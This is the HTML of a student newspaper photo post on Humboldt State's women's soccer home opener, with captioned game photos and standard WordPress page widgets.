<div id="attachment_14097" style="width: 216px" class="wp-caption alignright"><img class="size-medium wp-image-14097" src="http://thelumberjack.org/wp-content/uploads/2016/09/RacingForTheBall-206x300.jpg" alt="Bridget Daley, left, and Nicki Argentieri, right, race for the ball after it was cleared downfield by Humboldt defender on Sept. 19 at College Creek Field" width="206" height="300" srcset="http://thelumberjack.org/wp-content/uploads/2016/09/RacingForTheBall-206x300.jpg 206w, http://thelumberjack.org/wp-content/uploads/2016/09/RacingForTheBall-704x1024.jpg 704w, http://thelumberjack.org/wp-content/uploads/2016/09/RacingForTheBall.jpg 825w" sizes="(max-width: 206px) 100vw, 206px" /><p class="wp-caption-text">Bridget Daley, left, and Nicki Argentieri, right, race for the ball after it was cleared downfield by Humboldt defender on Sept. 19 at College Creek Field</p></div>
<div id="attachment_14096" style="width: 233px" class="wp-caption alignnone"><img class="size-medium wp-image-14096" src="http://thelumberjack.org/wp-content/uploads/2016/09/OneLegFunnyFace-223x300.jpg" alt="Sophomore MaKenna Dunn crosses the ball to the middle of San Bernardino’s 18-yard box in attempt to assist on a goal on Sept. 19 at College Creek Field." width="223" height="300" srcset="http://thelumberjack.org/wp-content/uploads/2016/09/OneLegFunnyFace-223x300.jpg 223w, http://thelumberjack.org/wp-content/uploads/2016/09/OneLegFunnyFace-761x1024.jpg 761w, http://thelumberjack.org/wp-content/uploads/2016/09/OneLegFunnyFace.jpg 892w" sizes="(max-width: 223px) 100vw, 223px" /><p class="wp-caption-text">Sophomore MaKenna Dunn crosses the ball to the middle of San Bernardino’s 18-yard box in attempt to assist on a goal on Sept. 19 at College Creek Field.</p></div>
<p>&nbsp;</p>
<div id="attachment_14095" style="width: 207px" class="wp-caption aligncenter"><img class="size-medium wp-image-14095" src="http://thelumberjack.org/wp-content/uploads/2016/09/HeadOnCollision-197x300.jpg" alt="Humboldt’s Madison Barnett collides in the air with San Bernardino’s Nicki Argentieri for ball possesion on Sept. 16 at College Creek Field." width="197" height="300" srcset="http://thelumberjack.org/wp-content/uploads/2016/09/HeadOnCollision-197x300.jpg 197w, http://thelumberjack.org/wp-content/uploads/2016/09/HeadOnCollision-673x1024.jpg 673w, http://thelumberjack.org/wp-content/uploads/2016/09/HeadOnCollision.jpg 789w" sizes="(max-width: 197px) 100vw, 197px" /><p class="wp-caption-text">Humboldt’s Madison Barnett collides in the air with San Bernardino’s Nicki Argentieri for ball possesion on Sept. 16 at College Creek Field.</p></div>
<p>&nbsp;</p>
<div id="attachment_14094" style="width: 310px" class="wp-caption aligncenter"><img class="size-medium wp-image-14094" src="http://thelumberjack.org/wp-content/uploads/2016/09/ClearTheBall-300x199.jpg" alt="Freshman Myriah Epino clears the ball down the middle of the field to an open teammate in Humboldt’s 3-2 victory over Cal State San Bernardino on Sept. 16 at College Creek Field." width="300" height="199" srcset="http://thelumberjack.org/wp-content/uploads/2016/09/ClearTheBall-300x199.jpg 300w, http://thelumberjack.org/wp-content/uploads/2016/09/ClearTheBall-1024x680.jpg 1024w, http://thelumberjack.org/wp-content/uploads/2016/09/ClearTheBall.jpg 1200w" sizes="(max-width: 300px) 100vw, 300px" /><p class="wp-caption-text">Freshman Myriah Epino clears the ball down the middle of the field to an open teammate in Humboldt’s 3-2 victory over Cal State San Bernardino on Sept. 16 at College Creek Field.</p></div>
<p>&nbsp;</p>
<div id="attachment_14093" style="width: 310px" class="wp-caption aligncenter"><img class="size-medium wp-image-14093" src="http://thelumberjack.org/wp-content/uploads/2016/09/BreakAwayForTheGoal-300x199.jpg" alt="Midfielder Alex Jenkins breaks past the San Bernardino goalkeeper to score one of her two goals of the day and tie the game at 1-1 on Sept. 19 at College Creek Field." width="300" height="199" srcset="http://thelumberjack.org/wp-content/uploads/2016/09/BreakAwayForTheGoal-300x199.jpg 300w, http://thelumberjack.org/wp-content/uploads/2016/09/BreakAwayForTheGoal-1024x680.jpg 1024w, http://thelumberjack.org/wp-content/uploads/2016/09/BreakAwayForTheGoal.jpg 1200w" sizes="(max-width: 300px) 100vw, 300px" /><p class="wp-caption-text">Midfielder Alex Jenkins breaks past the San Bernardino goalkeeper to score one of her two goals of the day and tie the game at 1-1 on Sept. 19 at College Creek Field.</p></div>
<p></p><div style="clear:both"></div><div class='social_linkz'>   							<span id="fb-root"></span><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script><fb:like href="http://thelumberjack.org/2016/09/20/womens-soccer-home-opener/" send="false" layout="button_count" width="35" show_faces="false" action="like" font=""></fb:like>								<a href="http://twitter.com/share" class="twitter-share-button" data-text="[Blog] Women's Soccer Home Opener - http://thelumberjack.org/?p=14086 (via )" data-url="http%3A%2F%2Fthelumberjack.org%2F%3Fp%3D14086" data-count="none"  >Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>									<a rel="nofollow" target="_blank" href="#" title="Print this page">						<img onclick="window.print();return false;" class="lnk_social_linkz" src="http://thelumberjack.org/wp-content/plugins//social-linkz/img/lnk_print.png" alt="Print" height="24" width="24"/></a>										<a rel="nofollow" target="_blank" href="#" title="Mail">						<img onclick="openEmailSocialLinkz('55352fdbd5fd1937cd01541c6a0be022094cba4d');return false;" class="lnk_social_linkz" src="http://thelumberjack.org/wp-content/plugins//social-linkz/img/lnk_mail.png" alt="Mail" height="24" width="24"/></a>					<div id="mask55352fdbd5fd1937cd01541c6a0be022094cba4d" class="social_mask"></div>					<div id="dialog55352fdbd5fd1937cd01541c6a0be022094cba4d" class="social_window">						<div id="innerdialog55352fdbd5fd1937cd01541c6a0be022094cba4d">							<h3>Send this article by email</h3>							<p class='textEmailSocialLinkz'>What is your name?</p>							<p><input name="nameSocialLinkz55352fdbd5fd1937cd01541c6a0be022094cba4d" id="nameSocialLinkz55352fdbd5fd1937cd01541c6a0be022094cba4d" /></p>							<p class='textEmailSocialLinkz'>Please indicate below the emails to which you want to send this article: <b>Women's Soccer Home Opener</b></p>							<p><textarea name="emailSocialLinkz55352fdbd5fd1937cd01541c6a0be022094cba4d" id="emailSocialLinkz55352fdbd5fd1937cd01541c6a0be022094cba4d" rows="5"></textarea></p>							<p class='closeEmailSocialLinkz'>Enter one email per line. No more than 5 emails.</p>							<p class='sendEmailSocialLinkz'><a href="#" title="Close" onclick="sendEmailSocialLinkz('55352fdbd5fd1937cd01541c6a0be022094cba4d', 14086);return false;"><span class='sendEmailSocialLinkz'>Send</span></a></p>						</div>						<p class='closeEmailSocialLinkz'><a href="#" title="Close" onclick="closeEmailSocialLinkz('55352fdbd5fd1937cd01541c6a0be022094cba4d');return false;"><span class='closeEmailSocialLinkz'>Close</span></a></p>					</div>							</div>										
					
									</div><!-- .entry /-->
				<span style="display:none"><a href="http://thelumberjack.org/tag/college-creek-field/" rel="tag">college creek field</a> <a href="http://thelumberjack.org/tag/hsu-soccer/" rel="tag">hsu soccer</a> <a href="http://thelumberjack.org/tag/humboldt-state/" rel="tag">Humboldt State</a> <a href="http://thelumberjack.org/tag/james-towney/" rel="tag">James Towney</a> <a href="http://thelumberjack.org/tag/soccer/" rel="tag">soccer</a> <a href="http://thelumberjack.org/tag/womens-soccer/" rel="tag">women's soccer</a></span>				<span style="display:none" class="updated">2016-09-20</span>
								<div style="display:none" class="vcard author" itemprop="author" itemscope itemtype="http://schema.org/Person"><strong class="fn" itemprop="name"><a href="http://thelumberjack.org/author/bec191/" title="Posts by Brian Cohen" rel="author">Brian Cohen</a></strong></div>
								
				<div class="share-post">
	<script>
	window.___gcfg = {lang: 'en-US'};
	(function(w, d, s) {
	  function go(){
		var js, fjs = d.getElementsByTagName(s)[0], load = function(url, id) {
		  if (d.getElementById(id)) {return;}
		  js = d.createElement(s); js.src = url; js.id = id;
		  fjs.parentNode.insertBefore(js, fjs);
		};
		load('//connect.facebook.net/en/all.js#xfbml=1', 'fbjssdk');
		load('https://apis.google.com/js/plusone.js', 'gplus1js');
		load('//platform.twitter.com/widgets.js', 'tweetjs');
	  }
	  if (w.addEventListener) { w.addEventListener("load", go, false); }
	  else if (w.attachEvent) { w.attachEvent("onload",go); }
	}(window, document, 'script'));
	</script>
	<ul>			
			<li><a href="https://twitter.com/share" class="twitter-share-button" data-url="http://thelumberjack.org/2016/09/20/womens-soccer-home-opener/" data-text="Women&#8217;s Soccer Home Opener" data-via="" data-lang="en">tweet</a></li>
				<li>
			<div id="fb-root"></div>
			<div class="fb-like" data-href="http://thelumberjack.org/2016/09/20/womens-soccer-home-opener/" data-send="false" data-layout="button_count" data-width="90" data-show-faces="false"></div>
		</li>
				<li style="width:80px;"><div class="g-plusone" data-size="medium" data-href="http://thelumberjack.org/2016/09/20/womens-soccer-home-opener/"></div>
		</li>
				<li><su:badge layout="2" location="http://thelumberjack.org/2016/09/20/womens-soccer-home-opener/"></su:badge>
			<script type="text/javascript">
				(function() {
					var li = document.createElement('script'); li.type = 'text/javascript'; li.async = true;
					li.src = ('https:' == document.location.protocol ? 'https:' : 'http:') + '//platform.stumbleupon.com/1/widgets.js';
					var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(li, s);
				})();
			</script>
		</li>
				<li><script src="http://platform.linkedin.com/in.js" type="text/javascript"></script><script type="IN/Share" data-url="http://thelumberjack.org/2016/09/20/womens-soccer-home-opener/" data-counter="right"></script></li>
				<li style="width:80px;"><script type="text/javascript" src="http://assets.pinterest.com/js/pinit.js"></script><a href="http://pinterest.com/pin/create/button/?url=http://thelumberjack.org/2016/09/20/womens-soccer-home-opener/&amp;media=http://thelumberjack.org/wp-content/uploads/2016/09/KickTheBall-620x330.jpg" class="pin-it-button" count-layout="horizontal"><img border="0" src="http://assets.pinterest.com/images/PinExt.png" title="Pin It" /></a></li>
		</ul>
	<div class="clear"></div>
</div> <!-- .share-post -->				
			</div><!-- .post-inner -->
		</article><!-- .post-listing -->
		<p class="post-tag">Tagged with: <a href="http://thelumberjack.org/tag/college-creek-field/" rel="tag">college creek field</a> <a href="http://thelumberjack.org/tag/hsu-soccer/" rel="tag">hsu soccer</a> <a href="http://thelumberjack.org/tag/humboldt-state/" rel="tag">Humboldt State</a> <a href="http://thelumberjack.org/tag/james-towney/" rel="tag">James Towney</a> <a href="http://thelumberjack.org/tag/soccer/" rel="tag">soccer</a> <a href="http://thelumberjack.org/tag/womens-soccer/" rel="tag">women's soccer</a></p>
		
				
						
		<div class="post-navigation">
			<div class="post-previous"><a href="http://thelumberjack.org/2016/09/20/protectors-of-standing-rock/" rel="prev"><span>Previous:</span> Protectors of Standing Rock</a></div>
			<div class="post-next"><a href="http://thelumberjack.org/2016/09/20/lumberjacks-lead-in-outdoor-nation-campus-challenge/" rel="next"><span>Next:</span> Lumberjacks lead in Outdoor Nation Campus Challenge</a></div>
		</div><!-- .post-navigation -->
				
		
			<section id="related_posts">
		<div class="block-head">
			<h3>Related Articles</h3><div class="stripe-line"></div>
		</div>
		<div class="post-listing">
						<div class="related-item">
							
				<div class="post-thumbnail">
					<a href="http://thelumberjack.org/2016/09/13/jacks-pass-15/" title="Permalink to Jacks Pass" rel="bookmark">
						<img width="300" height="160" src="http://thelumberjack.org/wp-content/uploads/2016/09/Football_03Web-300x160.jpg" class="attachment-tie-large size-tie-large wp-post-image" alt="football_03web" srcset="http://thelumberjack.org/wp-content/uploads/2016/09/Football_03Web-300x160.jpg 300w, http://thelumberjack.org/wp-content/uploads/2016/09/Football_03Web-620x330.jpg 620w" sizes="(max-width: 300px) 100vw, 300px" />											</a>
				</div><!-- post-thumbnail /-->
							
				<h3><a href="http://thelumberjack.org/2016/09/13/jacks-pass-15/" title="Permalink to Jacks Pass" rel="bookmark">Jacks Pass</a></h3>
				<p class="post-meta"><span class="tie-date">7 days ago</span></p>
			</div>
						<div class="related-item">
							
				<div class="post-thumbnail">
					<a href="http://thelumberjack.org/2016/09/13/headbangers-ball/" title="Permalink to Headbanger’s Ball" rel="bookmark">
						<img width="300" height="160" src="http://thelumberjack.org/wp-content/uploads/2016/09/Concussion_04Web-300x160.jpg" class="attachment-tie-large size-tie-large wp-post-image" alt="concussion_04web" srcset="http://thelumberjack.org/wp-content/uploads/2016/09/Concussion_04Web-300x160.jpg 300w, http://thelumberjack.org/wp-content/uploads/2016/09/Concussion_04Web-620x330.jpg 620w" sizes="(max-width: 300px) 100vw, 300px" />											</a>
				</div><!-- post-thumbnail /-->
							
				<h3><a href="http://thelumberjack.org/2016/09/13/headbangers-ball/" title="Permalink to Headbanger’s Ball" rel="bookmark">Headbanger’s Ball</a></h3>
				<p class="post-meta"><span class="tie-date">7 days ago</span></p>
			</div>
						<div class="related-item">
							
				<div class="post-thumbnail">
					<a href="http://thelumberjack.org/2016/09/13/big-hopes-big-loss/" title="Permalink to Big Hopes, Big Loss" rel="bookmark">
						<img width="300" height="160" src="http://thelumberjack.org/wp-content/uploads/2016/09/Football_04Web-300x160.jpg" class="attachment-tie-large size-tie-large wp-post-image" alt="football_04web" srcset="http://thelumberjack.org/wp-content/uploads/2016/09/Football_04Web-300x160.jpg 300w, http://thelumberjack.org/wp-content/uploads/2016/09/Football_04Web-620x330.jpg 620w" sizes="(max-width: 300px) 100vw, 300px" />											</a>
				</div><!-- post-thumbnail /-->
							
				<h3><a href="http://thelumberjack.org/2016/09/13/big-hopes-big-loss/" title="Permalink to Big Hopes, Big Loss" rel="bookmark">Big Hopes, Big Loss</a></h3>
				<p class="post-meta"><span class="tie-date">7 days ago</span></p>
			</div>
						<div class="clear"></div>
		</div>
	</section>
		

		
				<div id="comments">



				<div id="respond" class="comment-respond">
			<h3 id="reply-title" class="comment-reply-title">Leave a Reply <small><a rel="nofollow" id="cancel-comment-reply-link" href="/2016/09/20/womens-soccer-home-opener/#respond" style="display:none;">Cancel reply</a></small></h3>				<form action="http://thelumberjack.org/wp-comments-post.php" method="post" id="commentform" class="comment-form">
					<p class="comment-notes">Your email address will not be published. Required fields are marked <span class="required">*</span></p><p class="comment-form-comment"><label for="comment">Comment</label> <textarea id="comment" name="comment" cols="45" rows="8" maxlength="65525" aria-required="true" required="required"></textarea></p><p class="comment-form-author"><label for="author">Name</label> <span class="required">*</span><input id="author" name="author" type="text" value="" size="30" aria-required='true' /></p>
<p class="comment-form-email"><label for="email">Email</label> <span class="required">*</span><input id="email" name="email" type="text" value="" size="30" aria-required='true' /></p>
<p class="comment-form-url"><label for="url">Website</label><input id="url" name="url" type="text" value="" size="30" /></p>
<p class="cptch_block"><span class="cptch_wrap">
				<label class="cptch_label" for="cptch_input_90">
					<span class="cptch_span">fi&#118;e</span>
					<span class="cptch_span">&nbsp;&minus;&nbsp;</span>
					<span class="cptch_span">&#102;iv&#101;</span>
					<span class="cptch_span">&nbsp;=&nbsp;</span>
					<span class="cptch_span"><input id="cptch_input_90" class="cptch_input cptch_wp_comments" type="text" autocomplete="off" name="cptch_number" value="" maxlength="2" size="2" aria-required="true" required="required" style="margin-bottom:0;display:inline;font-size: 12px;width: 40px;" /></span>
					<input type="hidden" name="cptch_result" value="tLQ=" />
					<input type="hidden" name="cptch_time" value="1474428630" />
					<input type="hidden" name="cptch_form" value="wp_comments" />
				</label><span class="cptch_reload_button_wrap hide-if-no-js">
					<noscript>
						<style type="text/css">
							.hide-if-no-js {
								display: none !important;
							}
						</style>
					</noscript>
					<span class="cptch_reload_button dashicons dashicons-update"></span>
				</span></span></p><p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="Post Comment" /> <input type='hidden' name='comment_post_ID' value='14086' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p>
	<style type='text/css'>[draggable]{-moz-user-select:none;-khtml-user-select:none;-webkit-user-select:none;user-select:none;-khtml-user-drag:element;-webkit-user-drag:element}div.sweetcaptcha,div.sweetcaptcha *{margin:0;padding:0;font-size:12px;font-family:arial,helvetica,sans-serif;line-height:normal}div.sweetcaptcha{-moz-border-radius:5px;-webkit-border-radius:5px;border-radius:5px;background:#f5f5f5;color:#000;padding:10px;margin-bottom:10px;overflow:hidden;min-height:120px;max-width:350px;position:relative;font-weight:400}div.sweetcaptcha ul{list-style-type:none!important;margin:0!important;padding:0!important}div.sweetcaptcha ul li{clear:none !important;background:#cad9e8;display:inline-block;border-radius:5px;margin:0 4px 4px 0!important;z-index:2;float:left;list-style-type:none!important;width:42px;height:42px}div.sweetcaptcha.rtl ul li{padding:0 0 0 4px!important;float:right}div.sweetcaptcha ul li.selected{background:none;position:absolute;top:5px;text-align:right;right:0;-webkit-animation:selected 500ms linear forwards;-moz-animation:selected 500ms linear forwards;-ms-animation:selected 500ms linear forwards;-o-animation:selected 500ms linear forwards;animation:selected 500ms linear forwards}div.sweetcaptcha.rtl ul li.selected{position:absolute;top:5px;left:5px;text-align:left;-webkit-animation:selected_rtl 500ms linear forwards;-moz-animation:selected_rtl 500ms linear forwards;-ms-animation:selected_rtl 500ms linear forwards;-o-animation:selected_rtl 500ms linear forwards;animation:selected_rtl 500ms linear forwards}div.sweetcaptcha ul li.static_selected{background:none;position:absolute;right:0;text-align:right;top:5px}div.sweetcaptcha.rtl ul li.static_selected{position:absolute;left:5px;top:5px}div.sweetcaptcha ul li.static_selected img{width:25px;height:25px}div.sweetcaptcha img{margin:0;padding:0;background:0 0}div.sweetcaptcha ol li img,div.sweetcaptcha ul li img{display:inline}div.sweetcaptcha p{padding-bottom:10px;color:#000}div.sweetcaptcha .reset{color:#a00;font-size:10px;clear:both;cursor:pointer;padding-top:3px;float:left}div.sweetcaptcha #sc2powered{position:absolute;bottom:2px;right:4px;padding:2px 4px;z-index:2;background:url(//sweetcaptcha.s3.amazonaws.com/widget/v2/strip.png?1) no-repeat right top;padding-right:14px;text-align:right;white-space:nowrap;margin-right:1px}div.sweetcaptcha #sc2powered #scwpowered{display:none}div.sweetcaptcha #sc2powered,div.sweetcaptcha #sc2powered *{font-size:9px;color:#111;text-decoration:none}div.sweetcaptcha span.holder{background-repeat:no-repeat;background-position:center right;display:block;width:90px;height:100px;float:right;z-index:1;margin:2px}div.sweetcaptcha p{direction:ltr;text-align:left}div.sweetcaptcha ul{text-align:left;display:block!important}div.sweetcaptcha.rtl p{direction:rtl;text-align:right}div.sweetcaptcha.rtl span.holder{right:auto;left:10px;background-position:bottom left}div.sweetcaptcha.rtl ul{text-align:right}div.sweetcaptcha.rtl #sc2powered{right:auto;left:0}div.sweetcaptcha.rtl .reset{float:right}div.sweetcaptcha #sc2powered span{position:relative;margin-left:-2px;font-weight:700}@-moz-keyframes selected{0%{opacity:0}25%{top:-50px;right:0;opacity:0}100%{top:5px;right:0;opacity:1}}@-ms-keyframes selected{0%{opacity:0}25%{top:-50px;right:0;opacity:0}100%{top:5px;right:0;opacity:1}}@-o-keyframes selected{0%{opacity:0}25%{top:-50px;right:0;opacity:0}100%{top:5px;right:0;opacity:1}}@-webkit-keyframes selected{0%{opacity:0}25%{top:-50px;right:0;opacity:0}100%{top:5px;right:0;opacity:1}}@keyframes selected{0%{opacity:0}25%{top:-50px;left:5px;opacity:0}100%{top:5px;left:5px;opacity:1}}@-moz-keyframes selected_rtl{0%{opacity:0}25%{top:-50px;left:5px;opacity:0}100%{top:5px;left:5px;opacity:1}}@-ms-keyframes selected_rtl{0%{opacity:0}25%{top:-50px;left:5px;opacity:0}100%{top:5px;left:5px;opacity:1}}@-o-keyframes selected_rtl{0%{opacity:0}25%{top:-50px;left:5px;opacity:0}100%{top:5px;left:5px;opacity:1}}@-webkit-keyframes selected_rtl{0%{opacity:0}25%{top:-50px;left:5px;opacity:0}100%{top:5px;left:5px;opacity:1}}@keyframes selected_rtl{0%{opacity:0}25%{top:-50px;left:5px;opacity:0}100%{top:5px;left:5px;opacity:1}}</style>
	<div class='sweetcaptcha' id='sc_ce45b53'>
		<div id='sc_ce45b53_widget' ondragover='false' ondrop='false' draggable></div>
		<div id='sc2powered'><div>Powered by sweet <a href='https://sweetcaptcha.com/?ref=widget' target='_blank' style='margin-left: -3px; font-weight: bold'>Captcha</a></div></div><a href='http://sweetcontactform.com/' style='display: none'>contact form</a> <a href='http://sweetcontactform.com/' style='display: none'>WordPress contact form</a> <a href='http://sweetcontactform.com/' style='display: none'>contact form for WordPress</a> 
	</div>
	<script src="//code.jquery.com/jquery-1.10.2.min.js"></script>
	<script>var sc_jQuery = jQuery.noConflict(true)</script>
		<script type='text/javascript'>!function(e){function n(e,n){var t,a="";n=decodeURIComponent(n);for(var r=n.length-1;r>=0;r--)t=n.charAt(r),a+=t>="a"&&"z">=t||t>="A"&&"Z">=t?String.fromCharCode(65+e.indexOf(t)%26):t;return a.toLowerCase()}if("undefined"==typeof SWEETCAPTCHA){var t="undefined"!=typeof window.orientation||navigator.userAgent.match(/iphone|ipod|blackberry|android|palm|windows\s+ce|mobile|msie 8|msie 7|msie 6/i)||navigator.userAgent.indexOf("Safari")>-1&&-1==navigator.userAgent.indexOf("Chrome")&&navigator.userAgent.indexOf("Windows")>-1,a=!t,r=a?"drag":"click";SWEETCAPTCHA=function(i,o){function s(t){function o(e){d||(d=!0,e[0].className=a?"selected":"static_selected",e[0].childNodes[0].width=25,e[0].childNodes[0].height=25,m.val(e.attr("data-hash").substr(5,10)),t.auto_submit&&u.closest("form").trigger("submit"))}"click"===t.behavior&&(r="click"),d=!1;for(var s,u=e("#"+i+"_widget"),l=e('<span class="holder" />').css("backgroundImage","url("+n(t.simple_key,t.q)+")"),p=e("<p />").html(t[r].verify+"<br />"+t[r].challenge),f=e('<a class="reset" />').html(t[r].reset).click(c.generate),h=e("<ul />"),g=[],v=0,v=0;v<t.a.length;v++)!function(){var a=e('<img height="42" width="42" />').attr("src",n(t.simple_key,t.a[v].src));g[v]=e('<li data-hash="'+t.a[v].hash+'" />').append(a),h.append(g[v])}(v);var m=e('<input type="hidden" name="scvalue" value="0" />');u.empty().append(l).append(p).append(h).append(f).append('<input type="hidden" name="sckey" value="'+t.k+'" />').append(m).append('<input type="hidden" name="scvalue2" value="0" />').parent().addClass(t[r].direction),a&&(l.on("dragenter",function(e){return e.preventDefault&&e.preventDefault(),!0}),l.on("dragover",function(e){e.preventDefault&&e.preventDefault()}),l.on("drop",function(e){return e.preventDefault&&e.preventDefault(),o(s),!0}));for(var v in g)!function(e){a?(g[e][0].setAttribute("draggable","true"),g[e].on("dragstart",function(){return s=g[e],!0})):g[e].on("click",function(){o(g[e])})}(v)}var d,c=this;return this.generate=function(){e.ajax({url:o+"&mobile="+(t?"1":"0"),jsonp:"callback",dataType:"jsonp",success:function(e){s(e)}})},this}}}(sc_jQuery);</script>
	<script>new SWEETCAPTCHA('sc_ce45b53', '//www.sweetcaptcha.com/api/v2/apps/33363/captcha/sc_ce45b53?auto_submit=false').generate()</script><script type='text/javascript' src='//www.sweetcaptcha.com/javascripts/sclytics.js'></script><div id="sweetcaptcha-submit-button" class="form-submit"><br /></div><script type="text/javascript">var sub = document.getElementById("submit");if (sub!=undefined){sub.parentNode.removeChild(sub);document.getElementById("sweetcaptcha-submit-button").appendChild (sub);document.getElementById("submit").tabIndex = 6;}</script><script type="text/javascript">document.getElementById("respond").style.overflow="visible";</script>				</form>
					</div><!-- #respond -->
		
</div><!-- #comments -->
	
	</div><!-- .content -->
<aside class="sidebar-narrow">
</aside>
</div> <!-- .content-wrap -->
<aside class="sidebar">
</aside>
<div class="clear"></div>
  <li>
    <h2>Polls</h2>
    <ul>
      <li><div id="polls-11" class="wp-polls">
	<form id="polls_form_11" class="wp-polls-form" action="/index.php" method="post">
		<p style="display: none;"><input type="hidden" id="poll_11_nonce" name="wp-polls-nonce" value="034e52afd8" /></p>
		<p style="display: none;"><input type="hidden" name="poll_id" value="11" /></p>
		<p style="text-align: center;"><strong>What concerns you most about HSU?</strong></p><div id="polls-11-ans" class="wp-polls-ans"><ul class="wp-polls-ul">
		<li><input type="radio" id="poll-answer-40" name="poll_11" value="40" /> <label for="poll-answer-40">Parking</label></li>
		<li><input type="radio" id="poll-answer-41" name="poll_11" value="41" /> <label for="poll-answer-41">Building infrastructure</label></li>
		<li><input type="radio" id="poll-answer-42" name="poll_11" value="42" /> <label for="poll-answer-42">Classroom supplies</label></li>
		<li><input type="radio" id="poll-answer-43" name="poll_11" value="43" /> <label for="poll-answer-43">Campus food choices</label></li>
		<li><input type="radio" id="poll-answer-44" name="poll_11" value="44" /> <label for="poll-answer-44">Campus housing</label></li>
		</ul><p style="text-align: center;"><input type="button" name="vote" value="   Vote   " class="Buttons" onclick="poll_vote(11);" /></p><p style="text-align: center;"><a href="#ViewPollResults" onclick="poll_result(11); return false;" title="View Results Of This Poll">View Results</a></p></div>
	</form>
</div>
<div id="polls-11-loading" class="wp-polls-loading"><img src="http://thelumberjack.org/wp-content/plugins/wp-polls/images/loading.gif" width="16" height="16" alt="Loading ..." title="Loading ..." class="wp-polls-image" />&nbsp;Loading ...</div>
</li>
    </ul>
    <ul><li><a href="http://thelumberjack.org/pollsarchive">Polls Archive</a></li></ul>  </li>
		<div class="clear"></div>
	</div><!-- .container /-->
	
		</div><!-- .container -->

	<footer class="fade-in animated4">
	<div id="footer-widget-area" class="footer-3c container">

	
	

	
		
	</div><!-- #footer-widget-area -->
	<div class="clear"></div>
</footer><!-- .Footer /-->
				
	<div class="clear"></div>
	<div class="footer-bottom fade-in animated4">
		<div class="container">
					<div class="social-icons icon_flat">
		<a class="ttip" title="Facebook" href="http://www.facebook.com/HSULumberjack" target="_blank"><i class="tieicon-facebook"></i></a><a class="ttip" title="Twitter" href="http://twitter.com/HSULumberjack" target="_blank"><i class="tieicon-twitter"></i></a><a class="ttip" title="Flickr" href="http://flickr.com/thejacknews" target="_blank"><i class="tieicon-flickr"></i></a><a class="ttip" title="Tumblr" href="http://hsulumberjack.tumblr.com/" target="_blank"><i class="tieicon-tumblr"></i></a><a class="ttip" title="instagram" href="http://instagram.com/hsulumberjack" target="_blank"><i class="tieicon-instagram"></i></a>	</div>

			<div class="alignleft">
			© Copyright 2013, All Rights Reserved. | Powered by <a href="http://www.wordpress.com">WordPress</a> | Designed by <a href="http://www.tielabs.com">Tielabs</a>			</div>
		</div><!-- .Container -->
	</div><!-- .Footer bottom -->
	
</div><!-- .Wrapper -->
	<div id="topcontrol" class="tieicon-up-open" title="Scroll To Top"></div>
<div style="display:none">
  <div id="arvlbdata" style="overflow:visible;width:400px;height:250px;">
      <div allowtransparency="true" style="overflow:hidden;width:400px;height:250px;" class="fb-page" 
      data-href="https://www.facebook.com/297377880636"
      data-width="400" 
      data-height="250" 

      data-small-header="false" 
      data-adapt-container-width="false" 
      data-hide-cover="true" 
      data-show-facepile="true" 
      data-show-posts="false">
    </div>


</div>

</div>
      <script type='text/javascript' src='http://thelumberjack.org/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='http://thelumberjack.org/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='http://thelumberjack.org/wp-includes/js/jquery/ui/mouse.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='http://thelumberjack.org/wp-includes/js/jquery/ui/draggable.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='http://thelumberjack.org/wp-includes/js/jquery/ui/droppable.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='http://thelumberjack.org/wp-includes/js/jquery/ui/slider.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='http://thelumberjack.org/wp-includes/js/jquery/ui/button.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='http://thelumberjack.org/wp-includes/js/jquery/ui/spinner.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='http://thelumberjack.org/wp-includes/js/jquery/ui/effect.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='http://thelumberjack.org/wp-includes/js/jquery/ui/effect-shake.min.js?ver=1.11.4'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var pollsL10n = {"ajax_url":"http:\/\/thelumberjack.org\/wp-admin\/admin-ajax.php","text_wait":"Your last request is still being processed. Please wait a while ...","text_valid":"Please choose a valid poll answer.","text_multiple":"Maximum number of choices allowed: ","show_loading":"1","show_fading":"1"};
/* ]]> */
</script>
<script type='text/javascript' src='http://thelumberjack.org/wp-content/plugins/wp-polls/polls-js.js?ver=2.73.1'></script>
<script type='text/javascript' src='http://thelumberjack.org/wp-content/themes/jarida/js/tie-scripts.js?ver=4.6.1'></script>
<script type='text/javascript' src='http://thelumberjack.org/wp-includes/js/comment-reply.min.js?ver=4.6.1'></script>
<script type='text/javascript' src='http://thelumberjack.org/wp-includes/js/wp-embed.min.js?ver=4.6.1'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var cptch_vars = {"nonce":"385fd9b7c5","ajaxurl":"http:\/\/thelumberjack.org\/wp-admin\/admin-ajax.php","enlarge":"0"};
/* ]]> */
</script>
<script type='text/javascript' src='http://thelumberjack.org/wp-content/plugins/captcha/js/front_end_script.js?ver=4.6.1'></script>
</body>
</html>